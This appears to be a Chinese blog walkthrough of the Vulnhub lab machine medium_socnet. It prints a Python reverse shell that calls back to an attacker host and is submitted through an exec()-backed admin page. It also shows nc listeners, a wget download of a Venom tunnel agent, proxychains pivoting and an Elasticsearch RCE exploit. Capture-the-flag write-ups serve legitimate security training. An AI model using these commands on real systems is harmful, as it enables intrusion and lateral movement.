打靶第一周-Medium_socialnetwork

最新推荐文章于 2023-09-22 08:27:36 发布
最新推荐文章于 2023-09-22 08:27:36 发布
阅读量1.4k 收藏 6
点赞数 1
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcwdnmdnmd/article/details/120027016
版权

靶机-Medium_socialnetwork

靶机地址

Medium_socialnetwork

攻击手段

主机发现
端口扫描
服务发现
路径爬取
代码注入
Shell脚本
内网信息收集
内网穿透
漏洞利用
密码破解
本地提权
攻击代码修改

使用工具

nmap 主机发现
dirsearch 目录扫描
nc 端口侦听
venom 内网穿透
proxychains 代理
searchsploit exp查找

开始攻击

  1. 首先ifconfig查看自己ip
    在这里插入图片描述

  2. 扫描网段,发现目标主机。nmap 10.155.211.0/24。可看到开启了22,5000端口。
    在这里插入图片描述

  3. 扫描端口,查看服务。nmap 10.155.211.171 -p22,5000 -sV
    在这里插入图片描述
    访问目标
    在这里插入图片描述

  4. 只有一个输入框,测试xss
    在这里插入图片描述
    可以看到被编码了

  5. 换方向,尝试爆破路径。使用dirsearch
    在这里插入图片描述

  6. 访问http://192.168.168.12:5000/admin
    在这里插入图片描述
    可知所有代码将交给exec()函数执行,且前期发现系统中存在python环境
    可提交反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

参考:反弹shell的几种方式总结
先不提交

在这里插入图片描述

  1. 在kali使用nc启动侦听。nc -nvlp 4444得到shell
    在这里插入图片描述
  2. 看到dockerfile文件,怀疑为docker容器。判断容器

使用ls /.dockerenv查看是否存在dockerenv文件。
使用cat /proc/1/cgroup查看

  1. 查看内网主机,用ping命令扫描内网其他主机
    在这里插入图片描述
    是16位网段,所以需要扫65535个ip。使用for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done命令。(尝试扫描c段for i in $(seq 1 255);for s in $(seq 1 255); do ping -c 1 172.17.$i.$s; done但会报错)原因
    for a in`seq $num`
    在这里插入图片描述
    可看到172.17.0.2;172.17.0.3回包了

  2. 直接访问是不同的,需要使用内网穿透。使用venom工具,建立隧道。
    venom
    下载解压后选择合适的客户端。这里我们选择agent_linux_x64模块可看到有agent模块和admin模块
    在这里插入图片描述
    启用./admin_linux_x64 -lport 9999侦听9999端口
    在这里插入图片描述
    然后将agent_linux_x64传到目标机去。
    我们使用python开启一个http服务。(注意要在所传文件的当前目录创建服务)
    在这里插入图片描述
    然后用目标机访问服务,并下载agent_linux_x64

wget http://192.168.168.13/agent_linux_x64

在这里插入图片描述
之后给与权限

chmod +x agent_linux_x64

在这里插入图片描述
建立隧道

./agent_linux_x64 -rhost 192.168.168.13 -rport 9999

在这里插入图片描述
在这里插入图片描述

  1. 使用venom。
    show命令查看
    goto 1节点
    使用socks 1080,侦听1080端口
    这样在kali上就启动了一个侦听1080端口上的socks代理。
    在这里插入图片描述
  2. 为了让kali的攻击工具就可以通过挂代理访问内网网段。使用proxychain。由第(9)步知内网中有172.17.0.2;172.17.0.3两台机器。
    修改proxychain的配置文件vi /etc/proxychains4.conf在最后参照(11)修改代理类型为socks5 端口改为1080
    在这里插入图片描述
  3. 对内网机器扫描。
    proxychains nmap -Pn -sT 172.17.0.1
    在这里插入图片描述
    可看到开启了22,5000端口。使用proxychains nmap -p22,5000 -Pn -sT -sV 172.17.0.1详细扫描
    在这里插入图片描述
    由此确定172.17.0.1是192.168.168.12的内网 ip。也可尝试使用浏览器访问(需配置代理)
    在这里插入图片描述之后可看到192.168.168.12:5000的网页与172.17.0.1:5000相同。

扫172.17.0.2
proxychains nmap -Pn -sT 172.17.0.2,发现开放了9200端口
在这里插入图片描述
扫服务proxychains nmap -p9200 -Pn -sT -sV 172.17.0.2发现是Elasticsearch应用
在这里插入图片描述

  1. 搜索漏洞。使用searchsploit Elasticsearch搜索漏洞exp
    在这里插入图片描述第一第二个为rce利用脚本可以挨个尝试。

  2. 使用exp。proxychains python2 36337.py 172.17.0.2
    在这里插入图片描述getshell了。
    但发现无法运行是因为Elasticsearch中需要先有数据才能被攻击。
    https://github.com/YrenWu/Elhackstic
    proxychains curl -XPOST ' http://172.17.0.2:9200/twitter/user/yren ' -d ' { "name" : "deng" } '
    在执行exp不报错。

  3. 执行ls命令,发现有一个有趣的东西,密码文件。解密后发现使用john账户可登录

在第15步时,我提交了数据仍然报错,暂时不做了。后续做了在更。

dydymm
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
tang502的博客
09-24 1188
如果/proc/1/cgroup文件里面可以看到docker,以及docker的hash值。从页面exec()调用命令看出他是python,所以只要建立监听,用python反弹shell。反弹shell工具:https://forum.ywhack.com/shell.php。如果根目录下存在dockerenv,那么有极大的概率,我们是在docker环境中。查看ip,如果ip与网站ip不同,那么有极大的概率,我们是在docker环境中。发现为64的系统,可连接工具Venom,进行docks配置。
vulhub打靶第一周
qq_64201116的博客
06-02 592
title: vulhub打靶第一周description: vulhub打靶第一周 难度:middle。
安全牛】一起来打靶第一周笔记
jiji_king的博客
06-13 434
安全牛课堂】红队渗透一起来打靶第一周
medium_socnet靶场
wcl20010的博客
05-02 2715
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个网页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
乌尔曼-维克多_吸引子附matlab代码.zip
08-31
1.版本:matlab2014/2019a/2021a,内含运行结果,不会运行可私信 2.领域:智能优化算法、神经网络预测、信号处理、元胞自动机、图像处理、路径规划、无人机等多种领域的Matlab仿真,更多内容可点击博主头像 3.内容...
shooting.rar_MATLAB打靶法_matlab 打靶法_shooting method_shooting matl
07-14
shooting 打靶法,MATLAB编程,仅供参考。
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
打靶练习vulnhub: my-cmsms
最新发布
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
vulnhub靶场-SOCIAL NETWORK
qq_42947816的博客
05-10 496
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
靶机系列-----medium_socnet
weixin_43993545的博客
05-17 307
靶机系列-----medium_socnet,是一个简单的靶场,可以来尝试一下
0x01-medium_socnet
rec09er的博客
04-09 5367
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 通关目标:拿下目标靶机的root权限 攻击机:kali 目标靶机:medium_socnet 涉及攻击方法: ● 主机发现 ● 端口服务扫描 ● web侦查 ● 目录扫描 ● 代码注入 ● 反弹shell ● 内网信息搜集 ● 内
medium_socnet内网穿透靶机(解决5000扫描不到,和虚拟机启动成功问题)
一大口木的博客
09-22 475
我们导入我们下载号的靶机自作聪明,改了一下路径,不知道行不行点击导入这边就有了设置选择跟我一样的然后启动。。。。。上网上搜索,去关掉这个然后。。。。打开终端(以管理员身份运行)还不行~直到第二天,他提醒我下载最新版,你下载你年份的最新版就行。
medium_socnet
果粒程
11-21 835
vulnhub-medium_socnet靶机打靶过程
(vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3513
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
渗透测试--medium_socnet
weixin_44727454的博客
06-09 890
通过对medium_socnet靶机的渗透测试,了解关于内网渗透和关于Docker逃逸的知识。通过web层面的代码执行漏洞,执行python反弹shell获取shell。发现是在docker环境中。通过Vemon建立隧道,对内网进行主机发现和端口扫描,获取敏感文件找到真实主机的ssh登录用户和密码,最后通过Linux内核提权获取该靶机的root权限。...
BoredHackerBlog-Social Network
94小菜
08-11 602
Name:BoredHackerBlog-Social Network level:medium 文章目录总结 主机发现 netdiscover -i eht0 -r 192.168.43.1/24 目标锁定Vmware几个主机,地址193为存活主机,确定为靶机 端口扫描 5000端口为web服务,Werkzeug是python语言开发的底层框架,服务器编程语言是python 目录扫描 dirsearch -u 192.168.43.193:5000 管理后台命令执行,反弹shell python反
hdu 4039 The Social Network
weixin_30483495的博客
04-06 37
/* http://acm.hdu.edu.cn/showproblem.php?pid=4039 题意:给出N对好友关系,之后Q次提问,问可以对该用户推荐的相识度最高的好友; 推荐好友满足的条件:该用户的所有好友的好友中,出现次数最多的, 而且推荐好友本身不是该用户的好友;若有多个推荐好友时,按字典序输出; 一道悲剧的题啊*/ #include<stdio.h> ...
upload打靶第四关
01-11
根据引用内容,上传打靶第四关的目标是通过修改文件名进行绕过。以下是一种可能的解决方法: 1. 打开Burp Suite并配置代理。确保Burp Suite正在监听您的浏览器流量。 2. 登录到Upload-labs靶场,并导航到第四关。 3...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值